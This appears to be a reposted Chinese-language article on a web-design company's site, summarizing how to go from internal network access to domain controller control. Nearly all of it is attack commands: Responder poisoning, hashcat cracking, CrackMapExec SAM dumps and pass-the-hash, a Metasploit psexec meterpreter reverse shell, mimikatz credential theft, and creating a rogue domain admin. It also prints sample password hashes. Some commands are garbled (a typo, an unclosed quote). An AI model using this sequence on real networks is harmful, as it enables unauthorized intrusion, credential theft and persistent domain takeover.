Responder探测内网获取域控权限总结

Responder探测内网获取域控权限总结

专注于为中小企业提供成都网站建设、网站制作服务,电脑端+手机端+微信端的三站合一,更高效的管理,为中小企业轵城免费做网站提供优质的服务。我们立足成都，凝聚了一批互联网行业人才，有力地推动了上千余家企业的稳健成长，帮助中小企业通过网站建设实现规模扩充和转变。

(1)执行Responder探测内网（https://github.com/lgandx/Responder）

./Responder.py -I eth0 -rPv

（2）获取172.16.157.133的Responder值

（3）使用Crack Map Exec检查此主机的NetBIOS信息

cme smb 172.16.157.133

（4）使用hashcat对Responder值进行破解

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

获取密码值Winter2018!

（5）CME扫描

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

（6）获取本地的管理员帐户对本地密码散列进行dump

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

（7）获取FRONTDESK密码的NTLM哈希值

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

（8）哈希传递方式查看本地网络的smb权限情况

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-

auth

（9）可以登录172.16.157.134服务器

（10）对172.16.157.134进行查看，该计算机具备域控权限

cme smb 172.16.157.134

（11）msf下面利用smb口令进行shell获取

use exploit/windows/smb/psexec

set smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51

set smbuser administrator

set playload windows/x64/meterpreter/reverse_tcp

run

getuid

（12）使用mimikatz获取域控密码

load mimikatz

kerberos

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda

当前文章：Responder探测内网获取域控权限总结
网站路径：https://www.cdcxhl.com/article48/gdhdep.html

成都网站建设公司_创新互联，为您提供网站设计、企业网站制作、外贸建站、商城网站、外贸网站建设、虚拟主机

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联